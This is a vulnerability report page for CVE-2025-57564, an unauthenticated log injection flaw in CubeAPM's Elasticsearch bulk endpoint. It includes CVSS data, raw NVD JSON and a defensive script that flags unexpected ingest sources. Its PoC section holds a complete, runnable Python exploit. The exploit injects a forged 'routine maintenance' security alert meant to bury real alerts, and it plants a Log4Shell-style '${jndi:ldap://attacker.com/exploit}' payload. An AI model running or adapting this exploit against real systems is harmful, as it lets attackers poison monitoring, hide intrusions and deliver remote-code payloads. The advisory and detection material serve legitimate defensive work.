Security Vulnerability Report
CVE-2025-57564 CVSS 8.2 HIGH

CVE-2025-57564

Published: 2025-10-07 14:15:39
Last Modified: 2026-04-15 00:35:42

Description

CubeAPM nightly-2025-08-01-1 allows unauthenticated attackers to inject arbitrary log entries into production systems via the /api/logs/insert/elasticsearch/_bulk endpoint. This endpoint accepts bulk log data without requiring authentication or input validation, allowing remote attackers to perform unauthorized log injection. Exploitation may lead to false log entries, log poisoning, alert obfuscation, and potential performance degradation of the observability pipeline. The issue is present in the core CubeAPM platform and is not limited to specific deployment configurations.
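
Because the endpoint accepts writes from any client, one practical check is to review which sources are actually writing to it. The following is an added example, not part of the original record or of CubeAPM: it assumes a reverse proxy in front of CubeAPM that writes nginx "combined" access logs, and the shipper network and sample log lines are constructed for illustration.

```python
import ipaddress
import re
from collections import Counter

# Ingest path named in the CVE description.
BULK_PATH = "/api/logs/insert/elasticsearch/_bulk"
# Assumption: network(s) where your legitimate log shippers run (hypothetical value).
SHIPPER_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Leading fields of an nginx "combined" access-log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines, not captured traffic.
SAMPLE_LOG = """\
10.20.0.15 - - [07/Oct/2025:14:01:02 +0000] "POST /api/logs/insert/elasticsearch/_bulk HTTP/1.1" 200 31 "-" "Fluent-Bit"
203.0.113.50 - - [07/Oct/2025:14:01:09 +0000] "POST /api/logs/insert/elasticsearch/_bulk HTTP/1.1" 200 31 "-" "python-requests/2.32.3"
203.0.113.50 - - [07/Oct/2025:14:01:10 +0000] "POST /api/logs/insert/elasticsearch/_bulk?x=1 HTTP/1.1" 200 31 "-" "python-requests/2.32.3"
198.51.100.7 - - [07/Oct/2025:14:02:00 +0000] "GET / HTTP/1.1" 200 2 "-" "curl/8.5.0"
"""

def is_shipper(ip):
    """True if the client address belongs to a known log-shipper network."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable client field: treat as untrusted
    return any(addr in net for net in SHIPPER_NETS)

def find_unexpected_bulk_writes(log_text):
    """Count accepted (2xx) bulk-ingest POSTs per client outside the shipper networks."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Ignore query strings and trailing slashes when comparing the path.
        path = m["path"].split("?", 1)[0].rstrip("/")
        if path == BULK_PATH and m["status"].startswith("2") and not is_shipper(m["ip"]):
            hits[m["ip"]] += 1
    return hits

if __name__ == "__main__":
    for ip, n in find_unexpected_bulk_writes(SAMPLE_LOG).most_common():
        print(f"ALERT unexpected log-ingest source {ip}: {n} accepted bulk write(s)")
```

Any source this reports has successfully written log data without being a known shipper; the log entries it wrote should be treated as untrusted when reviewing alerts from the same period.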

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

CubeAPM nightly-2025-08-01-1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57564: CubeAPM Unauthenticated Log Injection PoC
# This PoC demonstrates arbitrary log injection via the /api/logs/insert/elasticsearch/_bulk endpoint
# No authentication required

import requests
import json
import sys
from datetime import datetime

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-cubeapm:8080"
ENDPOINT = f"{TARGET_URL}/api/logs/insert/elasticsearch/_bulk"

def inject_logs(target_host, log_entries):
    """
    Inject arbitrary log entries into CubeAPM without authentication.

    :param target_host: Target CubeAPM instance URL
    :param log_entries: List of log entry dictionaries to inject
    """
    headers = {
        "Content-Type": "application/x-ndjson",
        "User-Agent": "Mozilla/5.0 (compatible; LogInjector/1.0)"
    }

    # Build Elasticsearch Bulk API format payload
    bulk_data = ""
    for entry in log_entries:
        # Index action metadata
        action = json.dumps({"index": {"_index": entry.get("index", "logs")}})
        # Document body
        document = json.dumps({
            "@timestamp": entry.get("timestamp", datetime.utcnow().isoformat()),
            "message": entry.get("message", "Injected log entry"),
            "level": entry.get("level", "INFO"),
            "service": entry.get("service", "unknown"),
            "host": entry.get("host", "injected-host"),
            "source_ip": entry.get("source_ip", "0.0.0.0"),
            "user_agent": entry.get("user_agent", "CVE-2025-57564")
        })
        bulk_data += action + "\n" + document + "\n"

    try:
        response = requests.post(
            ENDPOINT,
            data=bulk_data,
            headers=headers,
            timeout=10
        )
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    # Example: Inject a false security alert to obfuscate real alerts
    false_alert = [{
        "index": "security-alerts",
        "message": "Routine maintenance check completed successfully",
        "level": "INFO",
        "service": "firewall",
        "host": "internal-server-01",
        "source_ip": "192.168.1.1",
        "user_agent": "internal-monitor"
    }]

    # Example: Inject logs with potentially malicious payloads
    malicious_logs = [{
        "index": "application-logs",
        "message": "${jndi:ldap://attacker.com/exploit}",  # Log4Shell-style payload
        "level": "WARN",
        "service": "web-app",
        "host": "production-server"
    }]

    print(f"[*] Target: {ENDPOINT}")
    print("[*] Injecting false alert logs...")
    inject_logs(TARGET_URL, false_alert)
    print("\n[*] Injecting test payload logs...")
    inject_logs(TARGET_URL, malicious_logs)
    print("\n[!] Log injection completed successfully")

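References

https://github.com/prassan10/CubeAPM/blob/main/CVE-2025-57564%3A%20Unauthenticated%20Log%20Injection%20in%20CubeAPM
https://github.com/prassan10/CubeAPM/blob/main/Unauthenticated-Log_Injection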

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57564", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:38.807", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CubeAPM nightly-2025-08-01-1 allow unauthenticated attackers to inject arbitrary log entries into production systems via the /api/logs/insert/elasticsearch/_bulk endpoint. This endpoint accepts bulk log data without requiring authentication or input validation, allowing remote attackers to perform unauthorized log injection. Exploitation may lead to false log entries, log poisoning, alert obfuscation, and potential performance degradation of the observability pipeline. The issue is present in the core CubeAPM platform and is not limited to specific deployment configurations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-117"}]}], "references": [{"url": "https://github.com/prassan10/CubeAPM/blob/main/CVE-2025-57564%3A%20Unauthenticated%20Log%20Injection%20in%20CubeAPM", "source": "[email protected]"}, {"url": "https://github.com/prassan10/CubeAPM/blob/main/Unauthenticated-Log_Injection", "source": "[email protected]"}]}}